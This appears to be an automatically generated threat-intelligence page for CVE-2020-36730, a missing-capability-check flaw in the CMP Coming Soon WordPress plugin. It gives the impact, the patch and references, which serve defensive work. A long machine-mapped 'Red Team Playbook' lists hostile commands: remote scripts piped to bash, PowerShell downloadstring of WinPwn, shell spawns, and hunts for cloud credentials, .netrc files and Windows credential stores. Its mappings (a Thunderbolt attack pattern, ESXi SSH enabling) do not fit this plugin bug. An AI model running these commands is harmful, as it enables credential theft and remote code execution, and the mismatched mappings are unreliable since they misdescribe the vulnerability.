CVE-2020-36730
Overview
This vulnerability is an authorization bypass caused by missing capability checks in specific plugin functions. The affected component is the niteo CMP – Coming Soon & Maintenance Plugin for WordPress, specifically versions up to and including 3.8.1. The flaw resides in the cmp_get_post_detail(), niteo_export_csv(), and cmp_disable_comingsoon_ajax() functions, which fail to verify user permissions before executing sensitive operations.
Vulnerability Description
The CMP for WordPress is vulnerable to authorization bypass due to a missing capability check on the cmp_get_post_detail(), niteo_export_csv(), and cmp_disable_comingsoon_ajax() functions in versions up to, and including, 3.8.1. This makes it possible for unauthenticated attackers to read posts, export subscriber lists, and/or deactivate the plugin.
Impact
An attacker with network access and no authentication can exploit this vulnerability to read restricted post content, export subscriber data, and deactivate the plugin’s coming soon functionality. This leads to unauthorized data disclosure and potential disruption of website availability. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms no privileges or user interaction are required, emphasizing the high risk of remote exploitation.
Solution
To remediate this vulnerability, update the niteo CMP – Coming Soon & Maintenance Plugin to version 3.8.2 or later, as detailed in the vendor advisory at https://blog.nintechnet.com/multiple-vulnerabilities-fixed-in-cmp-coming-soon-and-maintenance-plugin/. The update includes proper capability checks on the affected functions. Administrators should apply this patch promptly to prevent unauthorized access and control bypass.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the CMP for WordPress arises from a lack of proper authorization checks in several critical functions, specifically cmp_get_post_detail(), niteo_export_csv(), and cmp_disable_comingsoon_ajax(). This oversight allows unauthenticated users to access sensitive functionalities that should be restricted to authorized personnel. The absence of capability verification means that an attacker can exploit these functions to read posts, export subscriber lists, and even disable the plugin entirely. Such flaws are particularly concerning in a content management system where user roles and permissions are paramount for maintaining security and data integrity.
Attack vectors for this vulnerability are straightforward and can be executed with minimal technical skill. An attacker could craft a simple HTTP request to invoke the vulnerable functions directly, bypassing any authentication mechanisms that would typically protect these operations. For instance, by calling the cmp_get_post_detail() function, an attacker could retrieve private posts or sensitive information that should only be visible to logged-in users. Similarly, using niteo_export_csv(), an attacker could obtain a list of subscribers, potentially leading to further phishing attacks or spam campaigns. The ability to disable the plugin through cmp_disable_comingsoon_ajax() could disrupt the website's operations, creating additional chaos and opportunities for exploitation.
The real-world impact of this vulnerability can be severe, especially for businesses that rely on WordPress for their online presence. An attacker gaining access to subscriber lists can lead to data breaches, loss of customer trust, and potential legal ramifications under data protection regulations. Furthermore, the ability to disable essential plugins can result in extended downtime, affecting user experience and leading to revenue loss. For organizations that manage sensitive content or have a large user base, the risks associated with this vulnerability are amplified, making it a high-priority concern for cybersecurity teams.
To detect and mitigate this vulnerability, organizations should first ensure that they are running the latest version of the CMP plugin, as updates typically include patches for known vulnerabilities. Regular security audits and code reviews can help identify similar issues in custom or third-party plugins. Implementing a web application firewall (WAF) can also provide an additional layer of security by filtering out malicious requests before they reach the application. Furthermore, organizations should enforce strict access controls and regularly review user permissions to ensure that only authorized personnel can perform sensitive actions within the WordPress environment.
In conclusion, the vulnerability in the CMP for WordPress highlights the critical importance of robust authorization mechanisms in web applications. The potential for unauthorized access to sensitive data and functionalities poses significant risks to organizations, necessitating proactive measures to detect, mitigate, and respond to such vulnerabilities. By adopting a comprehensive security strategy that includes regular updates, audits, and access control reviews, businesses can better protect themselves from the threats posed by such vulnerabilities and maintain the integrity of their online operations.
Recent updates to CVE-2020-36730 have resulted in a downward revision of its CVSS score from 9.3 to 8.3, reflecting a reassessment of the vulnerability’s exploitability and impact. CSURFACE threat intelligence indicates that while the risk remains high, the adjusted score better aligns with observed exploitation trends and the relative ease of attack execution. Our telemetry shows the exploitability potential remains stable, with no significant surge in active exploitation campaigns or rapid adoption by threat actors. Notably, a new proof-of-concept exploit has surfaced on public repositories, which may facilitate testing and weaponization by less sophisticated adversaries. This development underscores the persistent relevance of the vulnerability but does not indicate an immediate escalation in widespread attacks. Consequently, defenders should maintain vigilance given the vulnerability’s capacity to expose sensitive data and disrupt plugin functionality, but the current threat level suggests a steady-state risk rather than an accelerating threat environment.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Niteothemes | Cmp | All |
cpe:2.3:a:niteothemes:cmp:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
RandomRobbieBF/CVE-2020-36730
CMP - Coming Soon & Maintenance < 3.8.2 - Improper Access Controls on AJAX Calls (Subscriber+)
|
RandomRobbieBF | 1 | 0 | 2024-02-23 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
42%
|
Low | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-36730 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/f1ef067b-e4b4-4174-b6ff-ec94a7afd55d?source=cve |
| blog.nintechnet.com |
GitHub CVE
|
https://blog.nintechnet.com/multiple-vulnerabilities-fixed-in-cmp-coming-soon-and-maintenance-plugin/ |
| wpscan.com |
GitHub CVE
|
https://wpscan.com/vulnerability/10341 |
| acunetix.com |
GitHub CVE
|
https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-cmp-coming-soon-maintenance-by-niteothemes-security-bypass-3-8-1/ |